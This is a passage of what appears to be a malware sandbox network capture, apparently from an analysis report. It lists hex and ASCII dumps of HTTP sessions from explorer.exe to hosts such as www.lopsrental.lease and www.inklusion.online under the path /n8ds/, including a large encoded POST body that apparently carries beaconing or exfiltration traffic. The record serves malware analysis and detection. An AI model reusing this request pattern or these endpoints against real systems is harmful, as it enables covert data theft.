                                                                                                                        Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
                                                                                                                        Nov 25, 2021 12:59:26.648755074 CET6462INData Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20
                                                                                                                        Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
                                                                                                                        Nov 25, 2021 12:59:26.648819923 CET6464INData Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34
                                                                                                                        Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
                                                                                                                        Nov 25, 2021 12:59:26.648866892 CET6464INData Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75
                                                                                                                        Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
                                                                                                                        Nov 25, 2021 12:59:26.648927927 CET6465INData Raw: 64 57 72 56 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a
                                                                                                                        Data Ascii: dWrV84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS
                                                                                                                        Nov 25, 2021 12:59:26.648988008 CET6466INData Raw: 73 55 74 73 78 4c 45 35 68 38 53 70 70 4e 4d 66 78 35 69 6a 57 48 70 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a
                                                                                                                        Data Ascii: sUtsxLE5h8SppNMfx5ijWHpb3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFI
                                                                                                                        Nov 25, 2021 12:59:26.649049997 CET6468INData Raw: 6a 66 69 63 35 33 53 6e 75 34 72 53 74 2b 48 74 59 6a 2b 4a 76 41 47 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77
                                                                                                                        Data Ascii: jfic53Snu4rSt+HtYj+JvAGJIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2u
                                                                                                                        Nov 25, 2021 12:59:26.649115086 CET6469INData Raw: 49 73 56 6e 48 51 76 47 66 48 4a 59 2b 47 73 46 4f 76 65 49 61 4c 6b 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79
                                                                                                                        Data Ascii: IsVnHQvGfHJY+GsFOveIaLkZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3
                                                                                                                        Nov 25, 2021 12:59:26.649175882 CET6471INData Raw: 62 61 4b 64 68 59 6b 30 71 76 4f 51 56 49 71 79 6b 70 38 72 73 6c 57 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53
                                                                                                                        Data Ascii: baKdhYk0qvOQVIqykp8rslWKKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOY
                                                                                                                        Nov 25, 2021 12:59:26.649240971 CET6472INData Raw: 50 33 55 43 44 61 59 67 2f 34 41 2f 4a 38 2b 65 6d 71 41 74 30 47 53 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73
                                                                                                                        Data Ascii: P3UCDaYg/4A/J8+emqAt0GSW9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBW
                                                                                                                        Nov 25, 2021 12:59:26.750144958 CET6473INData Raw: 39 79 46 49 39 70 49 64 59 71 59 66 31 4d 41 4e 36 52 49 2b 77 53 49 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37
                                                                                                                        Data Ascii: 9yFI9pIdYqYf1MAN6RI+wSI/qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMf


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        18192.168.11.204983066.29.140.18580C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 25, 2021 12:59:31.834853888 CET6484OUTGET /n8ds/?6ldD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&v6Mt=3fxxA4Z HTTP/1.1
                                                                                                                        Host: www.lopsrental.lease
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 25, 2021 12:59:32.055282116 CET6491INHTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 25 Nov 2021 11:59:31 GMT
                                                                                                                        Server: Apache/2.4.29 (Ubuntu)
                                                                                                                        Content-Length: 282
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 70 73 72 65 6e 74 61 6c 2e 6c 65 61 73 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        19192.168.11.20498353.64.163.5080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 25, 2021 13:00:58.945292950 CET6501OUTPOST /n8ds/ HTTP/1.1
                                                                                                                        Host: www.inklusion.online
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 131142
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.inklusion.online
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.inklusion.online/n8ds/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 36 6c 64 44 3d 33 56 45 69 59 58 53 66 54 54 54 35 52 6b 67 39 58 4c 78 76 35 4a 39 46 77 44 34 32 41 57 44 75 43 38 4d 7a 52 61 6e 69 76 71 45 6e 38 4b 6f 79 66 6b 55 4f 47 44 69 6d 58 77 77 58 48 37 58 6b 4e 59 34 6f 4e 63 6b 78 69 7a 31 68 67 70 79 4d 6d 67 6e 61 6c 30 67 69 47 4f 76 30 77 55 51 58 6c 52 4d 62 6f 79 6f 55 35 73 62 34 78 37 6a 33 75 7a 7e 75 28 53 35 6d 28 6c 69 5a 4e 39 6e 30 7a 35 32 6a 65 76 30 69 35 46 36 30 73 52 64 71 63 34 76 4a 28 77 4b 46 67 42 50 36 39 75 46 56 6a 71 39 6f 56 38 6f 50 50 5a 38 4d 58 30 72 63 4f 4e 76 31 7a 79 37 4e 38 44 34 52 6d 33 4d 4a 31 53 58 36 6e 42 39 42 36 4a 71 45 45 55 49 62 5a 72 58 6f 33 65 55 77 47 79 62 5f 69 59 31 47 6e 74 71 64 75 4b 64 31 78 75 34 57 50 57 6c 4a 6c 54 4b 4f 39 4b 73 66 6c 4e 47 54 33 67 53 64 53 44 6d 30 69 5f 4d 54 64 45 6d 68 4d 69 6f 54 31 35 79 37 45 4f 7e 66 6a 70 4e 2d 59 45 67 47 28 56 50 70 49 59 78 4e 6e 41 41 44 44 46 56 49 33 6e 61 56 37 79 70 39 58 35 46 46 35 56 66 50 76 55 39 43 4f 30 68 61 55 61 45 4c 66 33 72 5f 6c 76 45 34 61 73 48 36 78 4a 6d 70 46 6b 65 2d 4c 42 62 71 39 46 78 34 76 4c 51 34 63 42 62 64 4a 65 71 65 70 4c 52 6e 49 4b 6e 67 42 70 66 44 50 6c 73 5a 77 73 62 43 4d 31 45 31 66 63 72 5f 65 35 42 52 6a 56 41 49 7e 36 35 62 34 46 66 33 42 4c 51 7a 6b 75 4c 62 51 68 45 5f 67 50 59 65 70 73 54 47 69 76 68 32 6e 6f 57 74 32 36 53 45 6b 5a 63 49 48 4f 74 6b 63 4f 41 4b 68 62 6c 51 6e 34 64 7a 30 4a 54 51 28 38 4f 67 30 33 49 6d 66 43 4f 67 4a 73 4c 63 6e 77 4f 72 44 56 45 66 62 51 4c 72 6d 65 52 79 74 37 62 63 43 46 58 72 75 55 44 65 61 6d 59 47 66 46 64 55 32 54 6e 77 66 5a 51 64 38 32 6c 2d 36 75 47 4c 66 64 75 41 68 4c 33 65 64 71 5a 37 6c 4a 6a 47 72 6b 79 38 70 44 76 4b 50 72 49 53 70 4b 44 76 59 6c 39 6e 66 41 64 75 32 51 44 55 62 31 39 31 31 6a 65 78 73 66 7e 46 61 54 64 79 74 41 6f 30 6f 70 28 54 55 53 36 56 53 56 50 44 70 75 28 4b 6e 36 52 57 42 63 46 30 35 36 62 61 49 4f 6a 6d 6b 43 30 75 33 54 5a 33 59 41 61 35 49 45 51 7a 75 64 69 64 31 37 62 37 44 50 7e 45 31 46 4c 30 43 37 4e 6a 65 42 4d 66 55 39 4f 4d 55 36 58 58 79 49 33 33 58 34 4c 4d 72 53 70 6b 78 53 34 2d 67 32 37 49 4b 71 65 79 6b 5a 6f 56 4c 56 66 67 4a 79 6e 77 30 56 71 44 32 4f 67 75 7e 41 59 6c 57 7a 39 42 47 53 53 71 61 2d 70 53 6c 44 34 71 43 6e 52 6b 62 77 31 63 57 6b 54 41 30 6f 4a 43 57 6f 63 31 49 73 31 50 4e 4b 4c 4f 46 4e 47 30 43 6b 4a 6d 37 52 79 66 71 62 6f 52 7a 6d 62 72 46 36 4a 75 65 68 32 58 74 65 48 38 70 6f 73 35 36 37 55 37 54 71 57 64 71 66 62 46 78 4a 62 56 4a 51 38 32 51 72 52 6b 4f 43 70 49 5a 45 57 6a 4b 58 43 32 5a 73 4d 53 35 77 34 56 57 78 69 78 4e 6f 4d 39 55 42 71 4d 30 31 38 5f 54 5f 34 62 30 58 63 46 34 47 55 30 32 4f 53 42 65 44 79 56 62 6b 78 67 57 6e 67 74 48 49 56 70 6b 68 49 42 4a 73 61 6a 7a 67 48 41 58 76 61 52 53 47 66 34 45 37 50 42 39 66 46 76 77 52 41 71 6d 71 53 77 49 69 64 2d 76 57 68 44 49 6f 66 5a 6c 62 46 6f 71 76 75 33 49 59 62 75 52 6c 34 78 4d 58 67 38 36 65 44 44 46 41 52 50 45 69 51 54 49 63 54 75 4e 38 7a 46 50 43 53 56 76 64 66 79 77 76 6e 4c 51 56 70 44 53 38 43 79 34 6e 4d 47 7a 46 70 53 28 73 4c 72 78 76 31 43 47 73 30 33 30 4a 35 68 4b 67 31 75 46 39 6d 59 57 2d 68 51 28 37 51 38 52 78 45 41 78 4e 45 6f 66 67 4b 68 6f 54 34 79 59 62 51 47 54 77 68 4f 50 50 64 55 7e 6d 28 62 6b 61 69 45 54 79 75 6b 61 5f 4c 71 73 38 77 68 50 35 77 77 5a 70 43 62 57 6f 70 41 4c 32 31 35 39 32 42 5a 4d 61 44 76 35 53 62 37 31 4f 6c 53 45 73 7e 44 6c 38 41 67 56 54 58 6f 63 6b 52 54 6f 57 48 37 37 6a 66 45 6f 6d 47 65 74 37 63 74 39 6e 7e 53 35 66 38 77 39 6e 57 43 57 4b 56 58 61 37 33 66 79 31 57 72 36 59 30 2d 33 52 36 46 31 54 30 43 75 69 66 46 68 63 5a 38 59 58 66 47 37 67 6f 58 64 35 37 41 4b 5f 6e 4c 4f 4e 6f 2d 6d 75 75 31 6c 75 32 4b 28 5f 41 44 59 6a 48 6c 49 4e 50 6f 41 54 53 71 4d 50 6e 55 7e 56 72 4f 44 63 73 70 4a 6e 4d 75 61 33 30 49 78 32 6e 66 68 62 4c 62 54 57 58 65 78 36 4b 64 59 63 54 67 65 77 6f 61 7a 76 6e 71 42 47 4e 6e 28 32 35 78 57 4d 51 5f 71 73 41 38 5a 31 57 78 66 70 71 6c 7a 65 4a 4d 5a 77 6b 51 63 37 30 6c 4c 71 48 73 4b 59 47 6c 6e 69 42 79 67 33 38 4d 65 30 41 64 6b 79
                                                                                                                        Data Ascii: 6ldD=3VEiYXSfTTT5Rkg9XLxv5J9FwD42AWDuC8MzRanivqEn8KoyfkUOGDimXwwXH7XkNY4oNckxiz1hgpyMmgnal0giGOv0wUQXlRMboyoU5sb4x7j3uz~u(S5m(liZN9n0z52jev0i5F60sRdqc4vJ(wKFgBP69uFVjq9oV8oPPZ8MX0rcONv1zy7N8D4Rm3MJ1SX6nB9B6JqEEUIbZrXo3eUwGyb_iY1GntqduKd1xu4WPWlJlTKO9KsflNGT3gSdSDm0i_MTdEmhMioT15y7EO~fjpN-YEgG(VPpIYxNnAADDFVI3naV7yp9X5FF5VfPvU9CO0haUaELf3r_lvE4asH6xJmpFke-LBbq9Fx4vLQ4cBbdJeqepLRnIKngBpfDPlsZwsbCM1E1fcr_e5BRjVAI~65b4Ff3BLQzkuLbQhE_gPYepsTGivh2noWt26SEkZcIHOtkcOAKhblQn4dz0JTQ(8Og03ImfCOgJsLcnwOrDVEfbQLrmeRyt7bcCFXruUDeamYGfFdU2TnwfZQd82l-6uGLfduAhL3edqZ7lJjGrky8pDvKPrISpKDvYl9nfAdu2QDUb1911jexsf~FaTdytAo0op(TUS6VSVPDpu(Kn6RWBcF056baIOjmkC0u3TZ3YAa5IEQzudid17b7DP~E1FL0C7NjeBMfU9OMU6XXyI33X4LMrSpkxS4-g27IKqeykZoVLVfgJynw0VqD2Ogu~AYlWz9BGSSqa-pSlD4qCnRkbw1cWkTA0oJCWoc1Is1PNKLOFNG0CkJm7RyfqboRzmbrF6Jueh2XteH8pos567U7TqWdqfbFxJbVJQ82QrRkOCpIZEWjKXC2ZsMS5w4VWxixNoM9UBqM018_T_4b0XcF4GU02OSBeDyVbkxgWngtHIVpkhIBJsajzgHAXvaRSGf4E7PB9fFvwRAqmqSwIid-vWhDIofZlbFoqvu3IYbuRl4xMXg86eDDFARPEiQTIcTuN8zFPCSVvdfywvnLQVpDS8Cy4nMGzFpS(sLrxv1CGs030J5hKg1uF9mYW-hQ(7Q8RxEAxNEofgKhoT4yYbQGTwhOPPdU~m(bkaiETyuka_Lqs8whP5wwZpCbWopAL21592BZMaDv5Sb71OlSEs~Dl8AgVTXockRToWH77jfEomGet7ct9n~S5f8w9nWCWKVXa73fy1Wr6Y0-3R6F1T0CuifFhcZ8YXfG7goXd57AK_nLONo-muu1lu2K(_ADYjHlINPoATSqMPnU~VrODcspJnMua30Ix2nfhbLbTWXex6KdYcTgewoazvnqBGNn(25xWMQ_qsA8Z1WxfpqlzeJMZwkQc70lLqHsKYGlniByg38Me0AdkyruYp1Xo4STz7m_U_3waXxjWtCXZuAYBrev~P~MTvIjoHdFuCw-YSH6fCRgiRTl8KHQ03sdoZwgQog09LIqh8MArqB3Z4lbo6hd425zNm6s4vSU7yBDwdSZ9w~FzEfqRuuap8KifCh9Hxwg8axP4QymV8GEpewttVbyRsK6VFqsUnsEvpw-G-qDafQ4gnrbBdF4WeX6b0KINVsW4W(p4iXWwoVEApuvDLa9dUdAk9NECUWdAqWiFElBP_qV8BuAGHH8fPmxbpD_tRgTZYZznP1RqRbRmfIvX_7jlLFD9eX-cdT0~To-E6O9kycoOFh-d63xWMfHwjy_3pUFhxQX0wyeixsHtFioR5lIwNm9Sk~ok8(ftDwxiIN-Br~rsmlSHBLt27u4oXFx18Wtom~l7MD762uFaIbYciBD19sfx2ImW6Cu7kCX~RMy8h7luVB-P5RnuxIpR0L9lr8HLpzToWgkhMRX7LAj2opRyt2hXnuzXCPbC7xBFinqMKJJ4WiAABiQgXLyFQ83mcWlOr6J6frYnu2FdkJQTdvGOrEB1U4AOfVDiNDiyTq2LNIBgBPWZ7u_IH8LqCscYeChJhPsBM4_jkdko6iBQhVJJWre~acneo81E5~sUrtcDa2872zGKGbLI_gBbcXiyAggg6joc5N5l7LgbB5Sk6mGlKCMv0J5cQhNGwk45Ss5CCilxwMWbOxzHM9NIM4yc6E4HyHsMpxbsLw1pAovl2xEcNXL3H(QsGt0a-(NyR97AJL5OFB5T_jUEaQWgDQ9VZly3sDTf4hfN6qb3Ek6Kgn6VxPedit2NphtLod6mWuU9cZrW8(PO5vB0_iG4oUHkmbry5z5DPUA9J3Y7vURRDZ677xKggyxLqQopyCin2uvlZrAfH7xMdPvoPIcl7UwUlHo66rpp-s4nMuqUllFkZv2hg6V5yRdR8rA9MyvbUBujyMlFnVudtRF5fWY8IP1uqGHtAIpYT5JqbuE3e8hFNMPRDaffGlXXHY4Puu0B9AfCtChMX6lNmh9NPWgQA0HQRpFjB4z1wKrhFg8QM1nLV0Vuu2TkX244HSD204JWtsG58SYY_gRe6u21h9iB4HsPY1qOqXEE3VZILg61tdo~McWtgTkcyBcHm3IjjuK4SrM2G(ebz2l8Rad64(OLOpasQVteb49VFSE5uoYgyTojLJTbx78g80JtFNf2yH3QEjv9rEmlgh7r-Jz9AHVS70xphM_TPRTO4ly1XojPwhNjWHuV2RMdRVbwnt-7ACGP43fzkZ7Jhg4lo0xcRF0FjUZR0mPyiyg3jfE2K10GrHp~z0gql~TXQkbok83Yf8vMMGBBSFFpVHwNzY_ApXeGE6ziBD8vVy_8B94kruVzXTCqE~Kh-WVl-gQ4h5Gkywuj7U_GvozjBXrKLtW9LnEiHZV~9FQT-OH1s5YcavtY5FxSk9WCfPN5SDbXXQyOoHqT0Uc4EWOO53Us5j_4ohEEr98WEwwi8oN3gmR6SLpPXT_tbpvW9YVgHBI7DMUPzef~adFQaiyBd4yH2XuduslxrpISxM8cdwZ1U4aGUhkS7lMATmSP-Kxn51aupTqp6~XHWLqnEy-eyDEUiCbp6Y4YPrHB6V0A0QF5JxnTchHSnh0W3K-9oqvJkLQ3CJ5TDPcj4(HXaATth(8y-NnvBrAVuvmBu7lxWM9xRp5yIjJ7GJEaGr_XMjLCuHAYN3oYugz9mLgeTRFI_hssoQtCexJHE7jygXlPDj_e90QkKQwj_1LMZ08SFtGyDJIG2NbVhWhqWUBlLrbInlQA-(2jlRbjeCUeZwpqAoV0q1lm6jGpDKtsbGkkkwWecGO(kCiYmmPI5tMhL5Q~NacIYvqXMNLTLwZD72f5Yp2X5uO(djJ6Q3ztCVfqYFz4gkH1sNHLkbAiWAoSjoxf3tOB5x7STD6RySIaSaOT7aK0BhOeDIrDiQASg27JhryfrDULz2iLOw-lyER7Y9HDMxYEyclYtVCoP65B6xaX8SkIRoLLAWvP2gLWMs3tPpXkKkcGoK0(VK-K2h0FXUWozkLA4rGitIPfGiiSfxYHO~1XgbIMsc4THJKgyE5g-AdNGT3XBjQUhR-rZavrSieHuB3UAlyBZGaWBNbDOY0e6eDD-Dj4W265SD9bjbbkWS99usJt7y7cs6IJEenl4uqw4YBXgNI8ExUYPIO~d22n86hhrT0FIkxoUaNANlax6dViXmgb9e3UlW6vG8UO_D0IQMG7HylVHCkRTxOxWH46Cr3sXfLqTYz(KtGLqjTLdeoqrWytuwcPo3cwJTtjE72fTES28ZYNV8RZvSt1lHdsiOW2TXwIFMOElWFHkmMqAre9cah0dXFYgElFlyuxGAN5GUyhI3qxkr76-LJStPb5YxJCvb-A7L23md72uUtH7ZGR5w7nZ~98GG90dXLq0ZSf2cu~D~o1CQ1GHPZeJXD~nCpqepD92WYykAHhBgJ(PPW2E(YCIW8ks1DFFh3nNgJ(j2HVsoVIgwF2bPwt4aJXGrsbTwdCho10YfkB-QtkFm0j8ZVyNMRMr80Hm6FqbgBTrzClW4da0u1eiatVnXIOf9wkNVk7gE1(ayv0kXCVRrRpFtpjXW99jOS12ljnMK_iI32a4mpXnkWwPFt0fuqBaYkY_F8WOzt5GMX0NTyClVk85(2TO6Rv1bgot6wxm5KzGx0jY76o0oCoyTVOlkWL417C_TANXEse40bq3h-8
                                                                                                                        Nov 25, 2021 13:00:58.945389986 CET6507OUTData Raw: 4a 68 42 4b 58 5f 63 53 59 44 45 74 58 52 33 4b 31 79 58 44 66 53 78 5f 69 4d 67 6a 49 42 57 6b 45 44 74 53 77 47 75 5a 45 75 43 79 30 5a 56 46 6b 6e 36 47 45 68 7e 57 6d 32 68 45 45 7a 78 5f 4a 36 6c 79 73 41 44 72 4a 36 48 52 53 35 43 46 67 38
                                                                                                                        Data Ascii: JhBKX_cSYDEtXR3K1yXDfSx_iMgjIBWkEDtSwGuZEuCy0ZVFkn6GEh~Wm2hEEzx_J6lysADrJ6HRS5CFg8jWVRp4Ko20weYU61Zmo1mNU4OgJC(jNOObgqC2ONJEJ9OkqfiXQa0Y5LeVJun4nCNhJBMAnjeczbIVERvtIECCatnRXxxD1ToKb-7ZOPi9lQ~yPUh8mlKqg4VFkGCrW3lZb_kJHgAtdffEKsc9Ruwo2vmjpbAAlAY
                                                                                                                        Nov 25, 2021 13:00:58.956954002 CET6510OUTData Raw: 46 34 69 4e 6e 49 33 6f 76 65 73 54 55 4d 50 78 61 4b 58 2d 39 5f 4c 43 66 61 56 50 4b 62 41 69 32 63 56 32 36 57 28 77 69 5a 5a 78 37 4e 58 32 53 4b 61 74 30 6a 47 69 5a 6f 70 64 5a 76 71 75 70 72 43 4d 43 39 4c 57 37 76 4d 55 39 73 62 43 4c 55
                                                                                                                        Data Ascii: F4iNnI3ovesTUMPxaKX-9_LCfaVPKbAi2cV26W(wiZZx7NX2SKat0jGiZopdZvquprCMC9LW7vMU9sbCLUvejR1F0xYbDBDLoujmGT9lsxzo~FcOi89OOa9XkgPFK0uC~D2gcC9DzOtr69vHLajgGvJitnE_IjSudPt2s46Z~6e0DELz3OV-4g~a7Udte1wrlE4EmqoGLCNDldErazXooFAjbfRLpUbSm5wEVJGxzOXtFJ4W8Kp
                                                                                                                        Nov 25, 2021 13:00:58.957125902 CET6518OUTData Raw: 5a 63 35 52 61 6d 36 71 74 4b 59 74 38 66 48 46 4d 59 42 48 35 6d 54 4c 56 58 64 78 65 66 55 49 73 6d 70 73 4a 45 65 4d 61 6c 38 31 76 73 65 6e 51 6e 4a 6e 59 50 77 63 75 70 4c 36 4e 68 4c 73 77 73 71 6e 61 52 70 64 44 48 6d 71 50 30 37 51 6c 53
